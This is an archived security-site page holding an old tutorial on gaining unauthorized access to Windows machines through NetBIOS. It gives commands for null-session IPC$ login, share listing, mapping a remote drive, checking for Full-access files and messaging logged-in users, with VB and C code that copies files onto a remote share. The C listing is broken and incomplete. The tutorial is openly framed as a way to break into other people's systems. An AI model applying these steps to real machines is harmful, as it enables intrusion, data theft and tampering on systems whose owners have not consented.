exploit the possibilities


Posted Dec 4, 2002
Authored by r-22 | Site manshadow.org

How to hack windows machines with netbios.

tags | paper
systems | windows
MD5 | 08d4d8c8dda620c876b55020887ae2ba


Change Mirror Download
NetBIOS Usage Tutorial
date: 08.20.01
written by: r-22
e-mail: admin@manshadow.org

netbios, that handy utility for allowing remote access to windows system
and its files. who would have thought that microsoft would have setup the
biggest chance for unauthorized remote access to a windows system. well
maybe i should explain basically what it is and does in a little more detail
first. with netbios you have whats called shares, these shares are named
either by default or according to what the administrator desires. the shares
represent directories on the system that is running the share. like for
example the default for an NT system are C$, IPC$ and ADMIN$. like you would
think, the C$ is a share for the C:\ directory and the ADMIN$ is for remote
administration of the server. well what the hell is IPC$? to my understanding
this is for when one system needs to use netbios to communicate with another
system on a system level. it just so happens that you can sometimes trick the
netbios server into thinking you have rights to access the system by making
it think you are a system. the technique requires you to log into the ipc$
share with a NULL username and password. you can do this programatically or
with just DOS, there may be other methods as well. the dos command for logging
into shares uses the net command. the net command is useful for a lot of
things but well just deal with the share mapping for now. the syntax is:

net use [\\computername | \\ip][\share name]["password"][/user:"username"]

to establish a null ipc session you would do something like:

net use \\\ipc$ "" /user:""

this would say use the share ipc$ on with no password and no username.
you should see Command completed successfully. if it worked. now we want to
see what exactly they are sharing. to do this you would use the net view
command, the syntax is:

net view [\\computer name | \\ip]


net view \\

and this will say that i want to see a list of shares on the machine
you should see something like this:

Share name Type Used as Comment

C Disk
D Disk
E Disk
The command completed successfully.

notice the C, D, E and HP DESKJET 6. those are the shares on this particualr
machine. sometimes it will show the default shares other times it wont. the
only thing i can figure is that if there are no user defined shares then it will
show the defaults and if there are user defined shares then it will only show
the user defined ones. now we want to access C. using a variation on the net use
command from above we can do:

net use * \\\C

and this will say that i want to map the C share on to my machine. so
what is the *? that means that it will place the local directory for the share
next in the list of drive letters. so on my system i would see:

F:\ (connected to C on

that means my F:\ is the remote systems C:\ and that when i view and modify the
contents of my F:\ i am really viewing the contents on C:\ for the remote machine.
you can check file access rights with a command called cacls which works basically
like the dir command. you would use something like cacls autoexec.bat and what you
are looking for in this case is the Everyone account being set with the F flag which
means Everyone has Full access. well now its time to see who else is logged in.
this will use the nbtstat command with the -a switch. something like:

nbtstat -a

will show me results like this:

Local Area Connection:
Node IpAddress: [] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
GIOVE <00> UNIQUE Registered
REGNONERO <00> GROUP Registered
GIOVE <03> UNIQUE Registered
GIOVE <20> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered

MAC Address = 44-45-53-54-00-00

this looks like its just a bunch of crap but its actually useful. you just need
a table to be able to understand what all the information means. heres the table:

Name Number Type Usage
<computername> 00 U Workstation Service
<computername> 01 U Messenger Service
<\\_MSBROWSE_> 01 G Master Browser
<computername> 03 U Messenger Service
<computername> 06 U RAS Server Service
<computername> 1F U NetDDE Service
<computername> 20 U File Server Service
<computername> 21 U RAS Client Service
<computername> 22 U Exchange Interchange
<computername> 23 U Exchange Store
<computername> 24 U Exchange Directory
<computername> 30 U Modem Sharing Server Service
<computername> 31 U Modem Sharing Client Service
<computername> 43 U SMS Client Remote Control
<computername> 44 U SMS Admin Remote Control Tool
<computername> 45 U SMS Client Remote Chat
<computername> 46 U SMS Client Remote Transfer
<computername> 4C U DEC Pathworks TCPIP Service
<computername> 52 U DEC Pathworks TCPIP Service
<computername> 87 U Exchange MTA
<computername> 6A U Exchange IMC
<computername> BE U Network Monitor Agent
<computername> BF U Network Monitor Apps
<username> 03 U Messenger Service
<domain> 00 G Domain Name
<domain> 1B U Domain Master Browser
<domain> 1C G Domain Controllers
<domain> 1D U Master Browser
<domain> 1E G Browser Service Elections
<INet~Services> 1C G Internet Information Server
<IS~Computer_name> 00 U Internet Information Server
<computername> [2B] U Lotus Notes Server
Forte_$ND800ZA [20] U DCA Irmalan Gateway Service

if you look at the printout for the nbtstat you will see that GIOVE has an entry
for 03 and UNIQUE. now look at the table and see what that means. well assume
that GIOVE is a username and it says that this is for messenger service. and
that is someone logged into the system at the time. you can now send messages
to the remote system using the net send command. in this case i would do something

net send giove test

which would send the message "test" to the user GIOVE on the
system. you may also use ip addresses in place of the name to send messages.


VB and C source code for NetBIOS Transfers
appended: 12.01.02
coded by: r-22
e-mail: admin@manshadow.org

VB Source:
Private Function BlockCopy(sFileOrig As String, sFileNew As String) As Long
On Error GoTo ErrTrap
Dim bOrig(BLOCK_SIZE) As Byte, bNew() As Byte, nData As Integer
Dim nOpenOrig As Integer, nOpenNew As Integer, nK As Integer
Dim lStart As Long, lEnd As Long
nOpenOrig% = FreeFile
Open sFileOrig$ For Binary As #nOpenOrig%
lStart& = 1
lEnd& = LOF(nOpenOrig%)
nData% = ((lEnd& - lStart&) Mod BLOCK_SIZE) - ((lEnd& - lStart&) \ BLOCK_SIZE)
ReDim bNew(nData%)
nOpenNew% = FreeFile
Open sFileNew$ For Output As #nOpenNew%
Close #nOpenNew%
nOpenNew% = FreeFile
Open sFileNew$ For Binary As #nOpenNew%
Seek #nOpenOrig%, lStart&
For nK% = 0 To ((lEnd& - lStart&) \ BLOCK_SIZE) - 1
Get #nOpenOrig%, , bOrig()
Put #nOpenNew%, , bOrig()
Next nK%
If ((lEnd& - lStart&) Mod BLOCK_SIZE) > 0 Then
Get #nOpenOrig%, , bNew()
Put #nOpenNew%, , bNew()
End If
Close #nOpenOrig%
Close #nOpenNew%
BlockCopy& = 1
Exit Function
BlockCopy& = 0
End Function

'/* Usage: lRet& = MoveNetBIOS("", "C:\AutoExec.bat", "C:\AutoExec.bat") */
Public Function MoveNetBIOS(sIP As String, sFileFrom As String, sFileTo As String) As Long
On Error GoTo ErrTrap
Dim sPath As String
sFileTo$ = "\\" & sIP$ & "\" & Replace$(sFileTo$, ":", "")
MoveNetBIOS& = BlockCopy(sFileFrom$, sFileTo$)
Exit Function
MoveNetBIOS& = 0
End Function

C Source:
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

int MoveNetBIOS(const char *ip_addr, const char *file_from, const char* file_to)
char file_name[MAX_PATH];

strcpy(file_name, "\\\\");
strcat(file_name, ip_addr);
strcat(file_name, "\\");
strcat(file_name, file_to);
CopyFile(file_from, file_name, FALSE);
return 1;

int main(int argc, char *argv[])
MoveNetBIOS("", "C:\AutoExec.bat", "C\AutoExec.bat")
return 0;


RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

January 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    15 Files
  • 2
    Jan 2nd
    15 Files
  • 3
    Jan 3rd
    11 Files
  • 4
    Jan 4th
    1 Files
  • 5
    Jan 5th
    2 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    24 Files
  • 8
    Jan 8th
    15 Files
  • 9
    Jan 9th
    16 Files
  • 10
    Jan 10th
    23 Files
  • 11
    Jan 11th
    17 Files
  • 12
    Jan 12th
    3 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    18 Files
  • 15
    Jan 15th
    33 Files
  • 16
    Jan 16th
    23 Files
  • 17
    Jan 17th
    29 Files
  • 18
    Jan 18th
    15 Files
  • 19
    Jan 19th
    2 Files
  • 20
    Jan 20th
    1 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2019 Packet Storm. All rights reserved.

Security Services
Hosting By